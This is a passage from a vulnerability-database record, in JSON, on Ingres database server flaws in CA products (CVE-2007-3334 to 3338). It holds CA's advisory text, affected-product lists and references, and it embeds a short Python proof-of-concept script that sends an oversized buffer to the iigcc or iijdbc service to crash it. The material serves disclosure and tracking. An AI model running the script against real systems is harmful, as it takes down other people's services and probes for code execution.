"id": "25775",
"trust": 1.6
},
{
"db": "VUPEN",
"id": "ADV-2007-2288",
"trust": 1.6
},
{
"db": "VUPEN",
"id": "ADV-2007-2290",
"trust": 1.6
},
{
"db": "OSVDB",
"id": "37485",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2007-004028",
"trust": 0.8
},
{
"db": "BUGTRAQ",
"id": "20070625 INGRES WAKEUP SETUID(INGRES) FILE TRUNCATION",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-200706-394",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "57303",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "92818",
"trust": 0.1
}
],
"sources": [
{
"db": "BID",
"id": "24585"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-004028"
},
{
"db": "PACKETSTORM",
"id": "57303"
},
{
"db": "PACKETSTORM",
"id": "92818"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-394"
},
{
"db": "NVD",
"id": "CVE-2007-3337"
}
]
},
"id": "VAR-200706-0398",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.12878788
},
"last_update_date": "2025-04-10T22:57:36.896000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Ingres Security Alert",
"trust": 0.8,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-004028"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2007-3337"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
},
{
"trust": 2.0,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"trust": 1.7,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/24585"
},
{
"trust": 1.6,
"url": "http://www.ngssoftware.com/advisories/medium-risk-vulnerability-in-ingres-file-truncation/"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/25775"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/25756"
},
{
"trust": 1.0,
"url": "http://www.vupen.com/english/advisories/2007/2290"
},
{
"trust": 1.0,
"url": "http://osvdb.org/37485"
},
{
"trust": 1.0,
"url": "http://www.vupen.com/english/advisories/2007/2288"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/archive/1/472200/100/0/threaded"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3337"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-3337"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/472200/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2007/2290"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2007/2288"
},
{
"trust": 0.4,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546"
},
{
"trust": 0.3,
"url": "http://www.ingres.com/"
},
{
"trust": 0.3,
"url": "/archive/1/472192"
},
{
"trust": 0.3,
"url": "/archive/1/471950"
},
{
"trust": 0.3,
"url": "/archive/1/472197"
},
{
"trust": 0.3,
"url": "/archive/1/472193"
},
{
"trust": 0.3,
"url": "/archive/1/472194"
},
{
"trust": 0.3,
"url": "/archive/1/472200"
},
{
"trust": 0.3,
"url": "msg://bugtraq/649cdcb56c88aa458eff2cbf494b6204030a79ca@usilms12.ca.com"
},
{
"trust": 0.3,
"url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3336"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3334"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3337"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3338"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3336"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3338"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/contact/"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3334"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx"
},
{
"trust": 0.1,
"url": "http://servicedesk.ingres.com/caisd/pdmweb.ingres?op=show_detail+persid=kd:415738+htmpl=kt_document_view.htmpl"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/privacy/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com."
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450"
},
{
"trust": 0.1,
"url": "http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp"
},
{
"trust": 0.1,
"url": "http://osvdb.org/"
},
{
"trust": 0.1,
"url": "http://www.ngssoftware.com/research/advisories/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/legal/"
}
],
"sources": [
{
"db": "BID",
"id": "24585"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-004028"
},
{
"db": "PACKETSTORM",
"id": "57303"
},
{
"db": "PACKETSTORM",
"id": "92818"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-394"
},
{
"db": "NVD",
"id": "CVE-2007-3337"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "24585"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-004028"
},
{
"db": "PACKETSTORM",
"id": "57303"
},
{
"db": "PACKETSTORM",
"id": "92818"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-394"
},
{
"db": "NVD",
"id": "CVE-2007-3337"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2007-06-21T00:00:00",
"db": "BID",
"id": "24585"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-004028"
},
{
"date": "2007-06-26T21:32:27",
"db": "PACKETSTORM",
"id": "57303"
},
{
"date": "2010-08-17T01:35:50",
"db": "PACKETSTORM",
"id": "92818"
},
{
"date": "2007-06-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200706-394"
},
{
"date": "2007-06-22T18:30:00",
"db": "NVD",
"id": "CVE-2007-3337"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-03-19T08:36:00",
"db": "BID",
"id": "24585"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-004028"
},
{
"date": "2007-06-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200706-394"
},
{
"date": "2025-04-09T00:30:58.490000",
"db": "NVD",
"id": "CVE-2007-3337"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200706-394"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "CA Used in products Ingres database server Vulnerable to arbitrary file truncation",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-004028"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Boundary Condition Error",
"sources": [
{
"db": "BID",
"id": "24585"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-394"
}
],
"trust": 0.9
}
}
VAR-200706-0397
Vulnerability from variot - Updated: 2025-04-10 22:57Multiple "pointer overwrite" vulnerabilities in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (formerly Computer Associates) products, allow remote attackers to execute arbitrary code by sending certain TCP data at different times to the Ingres Communications Server Process (iigcc), which calls the (1) QUinsert or (2) QUremove functions with attacker-controlled input. Ingress Database Server included in CA eTrust Secure Content Manager is prone to multiple remote vulnerabilities, including multiple stack- and heap-based buffer-overflow issues, multiple pointer-overwrite issues, and an arbitrary-file-overwrite issue. Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file. Title: [CAID 35450, 35451, 35452, 35453]: CA Products That Embed Ingres Multiple Vulnerabilities
CA Vuln ID (CAID): 35450, 35451, 35452, 35453
CA Advisory Date: 2007-06-21
Reported By: NGSSoftware, and iDefense
Impact: Attackers can potentially execute arbitrary code, or overwrite files. CA has issued fixes, to address all of these vulnerabilities, for all supported CA products that may be affected.
3) Ingres wakeup file overwrite (reported by NGSSoftware) [Ingres bug 115913, CVE-2007-3337, CAID 35451] Description: The "wakeup" binary creates a file named "alarmwkp.def" in the current directory, truncating the file if it already exists. The "wakeup" binary is setuid "ingres" and world-executable. Consequently, an attacker can truncate a file with the privileges of the "ingres" user.
4) Ingres uuid_from_char stack overflow (reported by NGSSoftware) [Ingres bug 115911, CVE-2007-3338, CAID 35452] Description: An attacker can pass a long string as an argument to uuid_from_char() to cause a stack buffer overflow and the saved returned address can be overwritten.
5) Ingres verifydb local stack overflow (reported by NGSSoftware) [Ingres bug 115911, CVE-2007-3338, CAID 35452] Description: A local attacker can exploit a stack overflow in the Ingres verifydb utility duve_get_args function.
6) Communication server heap corruption (reported by iDefense) [Ingres bug 117523, CVE-2007-3334, CAID 35453] Description: An attacker can execute arbitrary code within the context of the communications server (iigcc.exe). This only affects Ingres on the Windows operating system. Reported by iDefense as IDEF2023.
7) Data Access/JDBC server heap corruption (reported by iDefense) [Ingres bug 117523, CVE-2007-3334, CAID 35453] Description: An attacker can execute arbitrary code within the context of the Data Access server (iigcd.exe) in r3 or the JDCB server in older releases. This only affects Ingres on the Windows operating system. Reported by iDefense as IDEF2022.
Mitigating Factors: None
Severity: CA has given these vulnerabilities a cumulative High risk rating.
Affected Products: Advantage Data Transformer r2.2 AllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1 AllFusion Harvest Change Manager r7, r7.1 BrightStor ARCserve Backup v9 (Linux only), r11.1, r11.5 (Unix, Linux and Mainframe Linux) BrightStor ARCserve Backup for Laptops and Desktops r11.5 BrightStor Enterprise Backup (Unix only) r10.5 BrightStor Storage Command Center r11.5 BrightStor Storage Resource Manager r11.5 CleverPath Aion Business Rules Expert r10.1 CleverPath Aion Business Process Monitoring r10.1 CleverPath Predictive Analysis Server r3 DocServer 1.1 eTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2 eTrust Audit r8 SP2 eTrust Directory r8.1 eTrust IAM Suite r8.0 eTrust IAM Toolkit r8.0, r8.1 eTrust Identity Manager r8.1 eTrust Network Forensics r8.1 eTrust Secure Content Manager r8 eTrust Single Sign-On r7, r8, r8.1 eTrust Web Access Control 1.0 Unicenter Advanced Systems Management r11 Unicenter Asset Intelligence r11 Unicenter Asset Management r11 Unicenter Asset Portfolio Management r11.2.1, r11.3 Unicenter CCS r11 Unicenter Database Command Center r11.1 Unicenter Desktop and Server Management r11 Unicenter Desktop Management Suite r11 Unicenter Enterprise Job Manager r1 SP3, r1 SP4 Unicenter Job Management Option r11 Unicenter Lightweight Portal 2 Unicenter Management Portal r3.1.1 Unicenter Network and Systems Management r3.0, r11 Unicenter Network and Systems Management - Tiered - Multi Platform r3.0 0305, r3.1 0403, r11.0 Unicenter Patch Management r11 Unicenter Remote Control 6, r11 Unicenter Service Accounting r11, r11.1 Unicenter Service Assure r2.2, r11, r11.1 Unicenter Service Catalog r11, r11.1 Unicenter Service Delivery r11.0, r11.1 Unicenter Service Intelligence r11 Unicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1 Unicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11, r11.1, r11.2 Unicenter Software Delivery r11 Unicenter TNG 2.4, 2.4.2, 2.4.2J Unicenter Workload Control Center r1 SP3, r1 SP4 Unicenter Web Services Distributed Management 3.11, 3.50 Wily SOA Manager 7.1
Affected Platforms: All operating system platforms supported by the various CA products that embed Ingres. This includes Windows, Linux, and supported UNIX platforms.
Status and Recommendation: CA recommends that customers apply the appropriate fix(es) listed on the Security Notice page: http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp
Workaround: None
References (URLs may wrap): CA SupportConnect: http://supportconnect.ca.com/ CA SupportConnect Security Notice for these vulnerabilities: Ingres Security Alert http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp Important Security Notice for Customers Using Products That Embed Ingres http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp CA Security Advisor posting: CA Products That Embed Ingres Multiple Vulnerabilities http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778 CA Vuln ID (CAID): 35450, 35451, 35452, 35453 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453 Ingres knowledge base document: http://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:415738+HTMPL=kt_document_view.htmpl Reported By: NGSSoftware, and iDefense NGSSoftware Advisory: http://www.ngssoftware.com/research/advisories/ iDefense Advisory: Ingres Database Multiple Heap Corruption Vulnerabilities http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546 CVE References: CVE-2007-3336, CVE-2007-3337, CVE-2007-3338, CVE-2007-3334 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3336 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3337 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3338 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3334 OSVDB References: Pending http://osvdb.org/
Changelog for this advisory: v1.0 - Initial Release
Customers who require additional information should contact CA Technical Support at http://supportconnect.ca.com.
For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com.
If you discover a vulnerability in CA products, please report your findings to vuln AT ca DOT com, or utilize our "Submit a Vulnerability" form. URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx
Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2007 CA. All rights reserved. # Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities
Date: 2010-08-14
Author: fdisk
Version: 2.6
Tested on: Windows 2003 Server SP1 en
CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338
Notes: Fixed in the last version.
please let me know if you are/were able to get code execution
import socket import sys
if len(sys.argv) != 4: print "Usage: ./CAAdvantageDoS.py " print "Vulnerable Services: iigcc, iijdbc" sys.exit(1)
host = sys.argv[1] port = int(sys.argv[2]) service = sys.argv[3]
if service == "iigcc": payload = "\x41" * 2106 elif service == "iijdbc": payload = "\x41" * 1066 else: print "Vulnerable Services: iigcc, iijdbc" sys.exit(1)
payload += "\x42" * 4
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) print "Sending payload" s.send(payload) data = s.recv(1024) s.close() print 'Received', repr(data)
print service + " crashed"
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200706-0397",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "database server",
"scope": "eq",
"trust": 2.4,
"vendor": "ingres",
"version": "r3"
},
{
"model": "database server",
"scope": "eq",
"trust": 2.4,
"vendor": "ingres",
"version": "2.6"
},
{
"model": "database server",
"scope": "eq",
"trust": 1.6,
"vendor": "ingres",
"version": "9.0.4"
},
{
"model": "database server",
"scope": "eq",
"trust": 1.6,
"vendor": "ingres",
"version": "2.5"
},
{
"model": "database server",
"scope": "eq",
"trust": 0.8,
"vendor": "ingres",
"version": "2006 9.0.4"
},
{
"model": "database server",
"scope": "eq",
"trust": 0.8,
"vendor": "ingres",
"version": "and 2.5"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "20060"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "3.0.3"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "2.6"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "2.5"
},
{
"model": "associates wily soa manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates unicenter workload control center 1.0.sp4",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates unicenter workload control center sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4.2"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"model": "associates unicenter tng 2.4.2j",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates unicenter software delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter serviceplus service desk sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter serviceplus service desk sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "5.5"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.2"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0.2"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter service delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter service catalog",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service assure",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"model": "associates unicenter service assure",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter service assure",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter patch management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter management portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1.1"
},
{
"model": "associates unicenter lightweight portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2"
},
{
"model": "associates unicenter job management option",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter enterprise job manager sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter enterprise job manager sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter desktop management suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter desktop and server management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter database command center",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter ca web services distributed management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter ca web services distributed management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.11"
},
{
"model": "associates unicenter asset portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.2.1"
},
{
"model": "associates unicenter asset portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter asset portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.3"
},
{
"model": "associates unicenter asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter asset intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter advanced systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates etrust web access control",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates etrust single sign-on",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust single sign-on",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8"
},
{
"model": "associates etrust single sign-on",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust network forensics",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust identity manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust iam toolkit",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust iam toolkit",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8"
},
{
"model": "associates etrust iam suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8"
},
{
"model": "associates etrust directory",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust audit r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust admin sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust admin sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates docserver",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates cleverpath predictive analysis server",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates cleverpath aion bre",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.1"
},
{
"model": "associates cleverpath aion bpm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.1"
},
{
"model": "associates ccs",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates brightstor storage resource manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates brightstor storage command center",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates brightstor enterprise backup for tru64",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates brightstor enterprise backup for solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates brightstor enterprise backup for hp",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates brightstor enterprise backup for aix",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates brightstor arcserve backup for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor arcserve backup for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "9.0"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for laptops and desktops",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates allfusion harvest change manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates allfusion harvest change manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7"
},
{
"model": "associates allfusion enterprise workbench",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates allfusion enterprise workbench",
"scope": "eq",
